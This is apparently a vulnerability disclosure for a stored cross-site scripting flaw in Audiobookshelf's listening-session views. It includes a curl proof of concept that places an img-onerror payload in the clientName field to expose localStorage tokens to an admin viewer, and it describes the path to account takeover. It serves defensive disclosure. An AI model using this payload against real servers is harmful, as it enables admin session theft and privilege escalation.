Summary

A session can be created by any signed-in user without extra permissions (Privileges Required: Low). If an attacker injects a malicious client name, it can trigger XSS when an admin visits the Listening Session view (/audiobookshelf/config/sessions/). Since this view is likely to be visited, the chance that the injection will run is high. This can be used to extract tokens or user objects.

As a user that can visit this page always is admin or higher this gives the attacker an admin account to inject with a 100% success rate, once the injection runs.

Details

This works at least in the session view (/audiobookshelf/config/sessions/) and the user view (/audiobookshelf/config/users/<>/sessions).

This also affects "guest" user types.

PoC

curl --request POST \
  --url http://localhost:13378/api/session/local \
  --header 'Authorization: Bearer <token>' \
  --header 'Content-Type: application/json' \
  --header 'User-Agent: insomnia/12.3.1' \
  --data '{
    "id": "a1b2c3d4-e5f6-7890-1234-abcdef123456", 
    "libraryItemId": "7db4b874-2670-41aa-aa29-173d4d8cd41c",
    "episodeId": "bce79130-58a8-4ce1-a9f9-617ce3ee0028",
    "mediaType": "podcast",
    "currentTime": 120.50,
    "timeListening": 3600.00,
    "duration": 2119.02,
    "startedAt": 1709827000000, 
    "updatedAt": 1709830600000, 
    "deviceInfo": {
      "deviceId": "abc",
      "clientName": "<img src=\"x\" onerror=\"alert(JSON.stringify(Object.fromEntries(Object.entries(localStorage))))\">"
    }
  }'

Impact

This gives every user of an ABS server a realistic chance of a complete takeover. A user could also send an admin a valid and harmless-looking link to the session screen (which indeed is just completely normal), which could trigger this. If done well, it should be possible to keep it fully invisible to the user attacked.
This impacts confidentiality, and also integrity and availability, since the attacker effectively gains a privilege escalation at that point.

Affected areas